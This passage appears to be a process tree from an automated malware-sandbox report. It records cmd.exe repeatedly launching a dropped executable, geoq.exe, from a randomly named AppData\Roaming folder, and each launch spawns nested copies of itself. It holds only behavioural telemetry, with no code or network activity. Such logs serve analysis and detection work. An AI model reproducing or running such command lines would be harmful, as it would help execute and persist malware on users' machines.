C:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exeC:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exe4⤵PID:5128
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exe2⤵PID:2388
-
C:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exeC:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exe3⤵PID:1492
-
C:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exeC:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exe4⤵PID:3392
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exe2⤵PID:1680
-
C:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exeC:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exe3⤵PID:5564
-
C:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exeC:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exe4⤵PID:1992
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exe2⤵PID:4072
-
C:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exeC:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exe3⤵PID:5340
-
C:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exeC:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exe4⤵PID:1892
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exe2⤵PID:5132
-
C:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exeC:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exe3⤵PID:4336
-
C:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exeC:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exe4⤵PID:4940
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exe2⤵PID:4880
-
C:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exeC:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exe3⤵PID:1436
-
C:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exeC:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exe4⤵PID:3916
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exe2⤵PID:1976
-
C:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exeC:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exe3⤵PID:524
-
C:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exeC:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exe4⤵PID:3280
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exe2⤵PID:2656
-
C:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exeC:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exe3⤵PID:1116
-
C:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exeC:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exe4⤵PID:5612
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exe2⤵PID:2012
-
C:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exeC:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exe3⤵PID:1892
-
C:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exeC:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exe4⤵PID:4588
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exe2⤵PID:5508
-
C:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exeC:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exe3⤵PID:5204
-
C:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exeC:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exe4⤵PID:264
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exe2⤵PID:2416
-
C:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exeC:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exe3⤵PID:5300
-
C:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exeC:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exe4⤵PID:5616
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exe2⤵PID:5052
-
C:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exeC:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exe3⤵PID:1708
-
C:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exeC:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exe4⤵PID:1540
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exe2⤵PID:3004
-
C:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exeC:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exe3⤵PID:3100
-
C:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exeC:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exe4⤵PID:556
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exe2⤵PID:3604
-
C:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exeC:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exe3⤵PID:4488
-
C:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exeC:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exe4⤵PID:3160
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exe2⤵PID:1932
-
C:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exeC:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exe3⤵PID:5536
-
C:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exeC:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exe4⤵PID:3208
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exe2⤵PID:4308
-
C:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exeC:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exe3⤵PID:5552
-
C:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exeC:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exe4⤵PID:3100
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exe2⤵PID:6020
-
C:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exeC:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exe3⤵PID:3220
-
C:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exeC:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exe4⤵PID:1692
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exe2⤵PID:776
-
C:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exeC:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exe3⤵PID:2452
-
C:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exeC:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exe4⤵PID:4536
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exe2⤵PID:5460
-
C:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exeC:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exe3⤵PID:2740
-
C:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exeC:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exe4⤵PID:5044
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exe2⤵PID:1492
-
C:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exeC:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exe3⤵PID:1692
-
C:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exeC:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exe4⤵PID:5972
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exe2⤵PID:1056
-
C:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exeC:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exe3⤵PID:2232
-
C:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exeC:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exe4⤵PID:3164
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exe2⤵PID:2864
-
C:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exeC:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exe3⤵PID:1992
-
C:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exeC:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exe4⤵PID:1972
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exe2⤵PID:1116
-
C:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exeC:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exe3⤵PID:4088
-
C:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exeC:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exe4⤵PID:1388
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exe2⤵PID:4180
-
C:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exeC:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exe3⤵PID:540
-
C:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exeC:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exe4⤵PID:4388
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exe2⤵PID:4524
-
C:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exeC:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exe3⤵PID:3512
-
C:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exeC:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exe4⤵PID:5132
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exe2⤵PID:144
-
C:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exeC:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exe3⤵PID:1988
-
C:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exeC:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exe4⤵PID:2964
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exe2⤵PID:1872
-
C:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exeC:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exe3⤵PID:1492
-
C:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exeC:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exe4⤵PID:4312
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exe2⤵PID:3004
-
C:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exeC:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exe3⤵PID:2856
-
C:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exeC:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exe4⤵PID:2700
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exe2⤵PID:4372
-
C:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exeC:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exe3⤵PID:3692
-
C:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exeC:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exe4⤵PID:1640
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exe2⤵PID:3236
-
C:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exeC:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exe3⤵PID:164
-
C:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exeC:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exe4⤵PID:1012
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exe2⤵PID:4564
-
C:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exeC:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exe3⤵PID:776
-
C:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exeC:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exe4⤵PID:2452
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exe2⤵PID:4848
-
C:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exeC:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exe3⤵PID:1736
-
C:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exeC:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exe4⤵PID:5892
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exe2⤵PID:1420
-
C:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exeC:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exe3⤵PID:3272
-
C:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exeC:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exe4⤵PID:1892
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exe2⤵PID:288
-
C:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exeC:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exe3⤵PID:5900
-
C:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exeC:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exe4⤵PID:1992
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exe2⤵PID:4072
-
C:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exeC:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exe3⤵PID:5400
-
C:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exeC:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exe4⤵PID:5924
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exe2⤵PID:5144
-
C:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exeC:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exe3⤵PID:1984
-
C:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exeC:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exe4⤵PID:5216
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exe2⤵PID:4488
-
C:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exeC:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exe3⤵PID:4384
-
C:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exeC:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exe4⤵PID:272
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exe2⤵PID:3872
-
C:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exeC:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exe3⤵PID:4504
-
C:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exeC:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exe4⤵PID:4672
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exe2⤵PID:5652
-
C:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exeC:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exe3⤵PID:5996
-
C:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exeC:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exe4⤵PID:1984
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exe2⤵PID:1056
-
C:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exeC:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exe3⤵PID:5368
-
C:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exeC:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exe4⤵PID:4568
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exe2⤵PID:3520
-
C:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exeC:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exe3⤵PID:5536
-
C:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exeC:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exe4⤵PID:2060
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exe2⤵PID:1516
-
C:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exeC:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exe3⤵PID:3172
-
C:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exeC:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exe4⤵PID:5112
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exe2⤵PID:3928
-
C:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exeC:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exe3⤵PID:1716
-
C:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exeC:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exe4⤵PID:5784
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exe2⤵PID:540
-
C:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exeC:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exe3⤵PID:4336
-
C:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exeC:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exe4⤵PID:1124
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exe2⤵PID:5576
-
C:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exeC:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exe3⤵PID:5900
-
C:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exeC:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exe4⤵PID:1364
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exe2⤵PID:144
-
C:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exeC:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exe3⤵PID:1400
-
C:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exeC:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exe4⤵PID:4372
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exe2⤵PID:5092
-
C:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exeC:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exe3⤵PID:2388
-
C:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exeC:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exe4⤵PID:1696
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exe2⤵PID:2580
-
C:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exeC:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exe3⤵PID:4376
-
C:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exeC:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exe4⤵PID:2280
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exe2⤵PID:1708
-
C:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exeC:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exe3⤵PID:6388
-
C:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exeC:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exe4⤵PID:6472
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exe2⤵PID:6036
-
C:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exeC:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exe3⤵PID:6224
-
C:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exeC:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exe4⤵PID:6440
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exe2⤵PID:4180
-
C:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exeC:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exe3⤵PID:5300
-
C:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exeC:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exe4⤵PID:3760
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exe2⤵PID:1064
-
C:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exeC:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exe3⤵PID:7100
-
C:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exeC:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exe4⤵PID:5452
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exe2⤵PID:3952
-
C:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exeC:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exe3⤵PID:6228
-
C:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exeC:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exe4⤵PID:6444
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exe2⤵PID:3604
-
C:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exeC:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exe3⤵PID:6808
-
C:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exeC:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exe4⤵PID:928
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exe2⤵PID:4308
-
C:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exeC:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exe3⤵PID:7012
-
C:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exeC:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exe4⤵PID:7108
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exe2⤵PID:6072
-
C:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exeC:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exe3⤵PID:1216
-
C:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exeC:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exe4⤵PID:6284
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exe2⤵PID:6324
-
C:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exeC:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exe3⤵PID:2296
-
C:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exeC:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exe4⤵PID:6836
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exe2⤵PID:6372
-
C:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exeC:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exe3⤵PID:6772
-
C:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exeC:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exe4⤵PID:6552
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exe2⤵PID:6708
-
C:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exeC:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exe3⤵PID:4872
-
C:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exeC:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exe4⤵PID:6228
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exe2⤵PID:6952
-
C:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exeC:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exe3⤵PID:7352
-
C:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exeC:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exe4⤵PID:7652
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exe2⤵PID:7036
-
C:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exeC:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exe3⤵PID:6244
-
C:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exeC:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exe4⤵PID:7396
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exe2⤵PID:7124
-
C:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exeC:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exe3⤵PID:8012
-
C:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exeC:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exe4⤵PID:6176
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exe2⤵PID:4428
-
C:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exeC:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exe3⤵PID:232
-
C:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exeC:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exe4⤵PID:7172
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exe2⤵PID:6276
-
C:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exeC:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exe3⤵PID:7228
-
C:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exeC:\Users\Admin\AppData\Roaming\Abyzhy\geoq.exe4⤵PID:7916
-
-
-
-
